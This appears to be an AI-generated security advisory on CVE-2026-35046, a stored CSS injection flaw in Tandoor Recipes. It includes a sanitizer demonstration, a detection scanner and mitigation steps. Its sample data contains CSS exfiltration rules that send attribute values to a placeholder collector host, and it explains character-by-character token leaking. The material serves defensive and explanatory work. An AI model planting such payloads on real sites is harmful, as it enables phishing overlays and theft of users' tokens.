CVE-2026-35046 Overview
CVE-2026-35046 is a CSS Injection vulnerability affecting Tandoor Recipes, an application for managing recipes, planning meals, and building shopping lists. Prior to version 2.6.4, Tandoor Recipes allows authenticated users to inject arbitrary <style> tags into recipe step instructions. The bleach.clean() sanitizer explicitly whitelists the <style> tag, causing the backend to persist and serve unsanitized CSS payloads via the API.
Any client consuming instructions_markdown from the API and rendering it as HTML without additional sanitization will execute attacker-controlled CSS — enabling UI redressing, phishing overlays, visual defacement, and CSS-based data exfiltration.
Critical Impact
Authenticated attackers can store malicious CSS in the application database; it is then applied in the browser of every user who views the affected recipe, enabling phishing overlays, UI manipulation, and exfiltration of values exposed in DOM attributes through CSS-based techniques.
Affected Products
- Tandoor Recipes versions prior to 2.6.4
Discovery Timeline
- 2026-04-06 - CVE-2026-35046 published to NVD
- 2026-04-07 - Last updated in NVD database
Technical Details for CVE-2026-35046
Vulnerability Analysis
This vulnerability (CWE-79: Cross-Site Scripting) stems from an improper input sanitization issue in Tandoor Recipes' handling of recipe step instructions. The application uses the Python bleach library to sanitize user-supplied HTML content; however, the configuration explicitly whitelists the <style> tag, creating a security gap that allows CSS injection attacks.
When authenticated users submit recipe step instructions containing <style> tags, the backend persists them, and because <style> is on the bleach.clean() allow-list the stylesheet is returned intact in the instructions_markdown field of the API response to any client that fetches the recipe.
CSS injection is less immediately dangerous than JavaScript-based XSS, but it is far from harmless. With control of a stylesheet an attacker can restyle the page into a convincing phishing overlay, hide or relabel controls, and leak data: attribute selectors such as input[value^="a"], combined with url() fetches, turn the browser into an oracle that reports, one character at a time, the value of attributes present in the DOM (a CSRF token in a hidden input, for example). The keystroke-logging variant works only where the front-end mirrors what the user types into the element's value attribute, so it is framework-dependent rather than universal.
Root Cause
The root cause of this vulnerability is the explicit whitelisting of the <style> tag in the bleach.clean() sanitizer configuration. While the sanitizer is designed to strip potentially dangerous HTML elements, the misconfiguration allows style elements to pass through unfiltered. This design flaw enables authenticated users to inject arbitrary CSS that persists in the database and executes when other users view the affected recipe content.
Attack Vector
The attack requires network access and authenticated user privileges. An attacker with a valid account can craft recipe step instructions containing malicious <style> tags. When another user views the recipe, the injected CSS executes in their browser context.
The exploitation flow involves submitting a recipe with embedded CSS in the step instructions, the backend storing the payload without sanitization, the API serving the malicious content via instructions_markdown, and victim browsers rendering the attacker-controlled CSS when viewing the recipe.
Since CSS can fetch external resources through properties such as background-image, an attacker can exfiltrate data by making the request URL depend on the data: one attribute-selector rule per candidate character, each pointing at a different path on an attacker-controlled host, so the attacker's server learns the value from which path was requested. The technique is limited to data exposed in DOM attributes or otherwise reachable by selectors; it cannot read arbitrary page text.
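As an added example (not the project's code and not part of the advisory), the block below uses a minimal standard-library allow-list sanitizer as a stand-in for bleach.clean(tags=..., strip=True) and feeds it a constructed recipe step containing the kind of attribute-selector exfiltration stylesheet described above. The two allow-lists are illustrative and do not reproduce Tandoor's real bleach configuration; collector.example is a placeholder host.

```python
from html import escape
from html.parser import HTMLParser

# Illustrative allow-lists (assumption: Tandoor's real bleach.clean() tag list is
# not reproduced here; what matters is whether "style" is in it).
VULNERABLE_ALLOWED = frozenset({"p", "b", "i", "strong", "em", "ul", "ol", "li", "br", "style"})
FIXED_ALLOWED = VULNERABLE_ALLOWED - {"style"}

# Constructed sample of a rendered recipe step (not taken from the advisory): a
# harmless paragraph, an injected stylesheet that leaks the first character of any
# input's value attribute to a hypothetical collector host, and a <script> to show
# that the allow-list does stop the obvious case.
STEP_HTML = (
    "<p>Whisk the eggs <b>gently</b>.</p>\n"
    "<style>\n"
    'input[value^="a"] { background: url("https://collector.example/a"); }\n'
    'input[value^="b"] { background: url("https://collector.example/b"); }\n'
    "</style>\n"
    "<script>alert(1)</script>"
)


class AllowListSanitizer(HTMLParser):
    """Minimal stand-in for bleach.clean(tags=allowed, strip=True): allowed
    elements are kept, other tags are dropped and their text kept as escaped text."""

    def __init__(self, allowed):
        super().__init__(convert_charrefs=True)
        self.allowed = allowed
        self.out = []
        self.in_style = False

    def handle_starttag(self, tag, attrs):
        if tag in self.allowed:
            self.out.append(f"<{tag}>")  # attributes dropped to keep the example short
            self.in_style = tag == "style"

    def handle_endtag(self, tag):
        if tag in self.allowed:
            self.out.append(f"</{tag}>")
            self.in_style = False

    def handle_data(self, data):
        # Inside an allowed <style>, the CSS goes out raw, exactly as the browser
        # will parse it; everywhere else text is HTML-escaped.
        self.out.append(data if self.in_style else escape(data, quote=False))


def sanitize(html, allowed):
    parser = AllowListSanitizer(allowed)
    parser.feed(html)
    parser.close()
    return "".join(parser.out)


def css_survives(html, allowed):
    """True if a live <style> element reaches the output."""
    return "<style>" in sanitize(html, allowed)


if __name__ == "__main__":
    print("vulnerable allow-list keeps CSS:", css_survives(STEP_HTML, VULNERABLE_ALLOWED))  # True
    print("fixed allow-list keeps CSS:    ", css_survives(STEP_HTML, FIXED_ALLOWED))  # False
    print(sanitize(STEP_HTML, FIXED_ALLOWED))
```

With "style" in the allow-list the stylesheet reaches the client byte for byte while the <script> is stripped, which is precisely the gap: the allow-list works as designed, it just allows the wrong element. Removing "style" leaves the CSS as inert escaped text. Real bleach keeps a disallowed element's text with strip=True and escapes the tags themselves with strip=False; either way the CSS stops being a live stylesheet.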
Detection Methods for CVE-2026-35046
Indicators of Compromise
- Presence of <style> tags within recipe step instructions or instructions_markdown fields in the database
- Unusual CSS content referencing external domains in recipe data
- API responses containing embedded style blocks with suspicious selectors or properties
- User reports of unexpected visual changes or overlay elements when viewing recipes
Detection Strategies
- Deploy a Content Security Policy whose style-src directive omits 'unsafe-inline'; the browser then refuses injected <style> elements, and a report-to or report-uri directive turns each refusal into a violation report that can be alerted on. Test before enforcing: the front-end's own inline styles need nonces or hashes to keep working.
- Monitor database records for <style> tag patterns in user-generated content fields
- Review application logs for recipe submissions containing HTML style elements; standard access logs do not record request bodies, so this needs request-body logging at the proxy or application layer
- Deploy web application firewalls (WAF) with rules to detect CSS injection patterns
Monitoring Recommendations
- Enable logging of all recipe creation and modification events with content inspection
- Set up alerts for API responses containing inline style blocks
- Monitor for external resource requests originating from CSS in user content
- Implement periodic database scans to identify existing malicious payloads
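The scanner below is an added example (not from the advisory or from Tandoor) that implements the indicators above over recipe-step rows: it locates <style> blocks, extracts the hosts referenced by url() and @import, and counts attribute-selector probes of the [value^="..."] kind that characterise CSS exfiltration. The rows are constructed sample data; the table and column names in the comment assume Tandoor's Step model (cookbook_step.instruction) and must be verified against your schema, and recipes.example, collector.example and cdn.example are placeholder hosts.

```python
import re
from urllib.parse import urlsplit

# Candidate rows can be pulled with a query such as the following (assumption:
# Tandoor's Step model in the "cookbook" Django app; verify against your schema):
#   SELECT id, instruction FROM cookbook_step WHERE LOWER(instruction) LIKE '%<style%';
# Constructed sample rows standing in for that query's result:
SAMPLE_ROWS = [
    (1, "Preheat the oven to 200 C and line the tin."),
    (2, "<style>.step { background: url(/static/paper.png); }</style>Fold in the flour."),
    (3, '<style>\n'
        'input[value^="a"] { background: url("https://collector.example/a"); }\n'
        'input[value^="b"] { background: url("https://collector.example/b"); }\n'
        '</style>Serve warm.'),
    (4, '<STYLE>@import "https://cdn.example/overlay.css";</STYLE>'),
]

STYLE_RE = re.compile(r"<style\b[^>]*>(.*?)</style\s*>", re.I | re.S)
URL_RE = re.compile(r"""url\(\s*['"]?([^'")\s]+)""", re.I)
IMPORT_RE = re.compile(r"""@import\s+['"]([^'"]+)['"]""", re.I)
# Attribute-selector probes such as [value^="a"], the building block of CSS exfiltration.
ATTR_PROBE_RE = re.compile(r"\[\s*[\w-]+\s*[\^$*]?=")


def external_hosts(css, own_hosts=frozenset()):
    """Hosts referenced by url() or @import that are not the site's own."""
    hosts = set()
    for m in list(URL_RE.finditer(css)) + list(IMPORT_RE.finditer(css)):
        host = urlsplit(m.group(1)).hostname  # None for relative and data: URLs
        if host and host.lower() not in own_hosts:
            hosts.add(host.lower())
    return hosts


def scan_steps(rows, own_hosts=frozenset()):
    """Return one finding per <style> block found in (step_id, instruction) rows."""
    findings = []
    for step_id, instruction in rows:
        for m in STYLE_RE.finditer(instruction or ""):
            css = m.group(1)
            findings.append({
                "step_id": step_id,
                "external_hosts": sorted(external_hosts(css, own_hosts)),
                "attribute_probes": len(ATTR_PROBE_RE.findall(css)),
            })
    return findings


if __name__ == "__main__":
    for f in scan_steps(SAMPLE_ROWS, own_hosts={"recipes.example"}):
        severity = "EXFIL" if f["external_hosts"] or f["attribute_probes"] else "review"
        print(f"step {f['step_id']}: {severity} hosts={f['external_hosts']} probes={f['attribute_probes']}")
```

A <style> block that references only local resources (row 2) is still a policy violation worth reviewing, but a block that references an external host or contains attribute probes (rows 3 and 4) should be treated as active exfiltration or overlay tooling and the author's account investigated.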
How to Mitigate CVE-2026-35046
Immediate Actions Required
- Upgrade Tandoor Recipes to version 2.6.4 or later immediately
- Audit existing recipe database entries for injected <style> tags and sanitize affected records
- Review application access logs to identify potential exploitation attempts
- Implement Content Security Policy headers that disallow inline styles (style-src without 'unsafe-inline', with nonces or hashes for the application's own styles)
Patch Information
The vulnerability has been fixed in Tandoor Recipes version 2.6.4. The patch removes <style> from the bleach.clean() whitelist, ensuring that style tags are properly sanitized from user input. Detailed information about the fix is available in the GitHub Release 2.6.4 and the GitHub Security Advisory GHSA-9hhh-g2fc-r8x2.
Workarounds
- If immediate upgrade is not possible, implement server-side middleware that removes <style> elements, including their CSS content, from recipe content before serving
- Configure a reverse proxy or WAF to filter style elements from API responses
- Implement client-side sanitization using libraries like DOMPurify when rendering instructions_markdown content, and make sure <style> is excluded from its allow-list (DOMPurify permits <style> by default unless it is listed in FORBID_TAGS)
- Restrict recipe creation privileges to trusted users until the patch can be applied
# Database cleanup example - identify potentially malicious entries
# Recipe steps live in the database, not under the media directory, so search a
# SQL dump (pg_dump/mysqldump) or query the step table directly:
grep -n -i "<style" /path/to/tandoor-dump.sql
# Or via database query (assumes Tandoor's Step model in the "cookbook" Django app;
# verify the table and column names against your schema before running):
# SELECT id, instruction FROM cookbook_step WHERE LOWER(instruction) LIKE '%<style%';
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

